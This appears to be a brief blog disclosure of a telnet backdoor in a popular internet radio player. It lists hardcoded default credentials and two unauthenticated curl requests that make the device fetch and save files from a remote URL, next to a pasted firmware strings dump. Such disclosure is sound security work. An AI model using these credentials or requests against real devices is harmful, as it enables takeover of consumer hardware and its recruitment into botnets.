An undocumented telnet backdoor was found in a popular radio player
Proof of concept
The default username’s and password’s where:
* root / password
* usb / winbond
The system runs an embedded linux kernel which is very common among IoT devices.
OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh_frame.init_array. fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes
Several actions can be performed without authentication:
Change the logo:
curl -XGET http://iphere/mylogo?url=http://example.com/own.jpg
Download a file:
curl -XGET http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1
This vulnerability and backdoor is most likely to be used in bigger automated
attacks such as the Mirai botnet.
This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.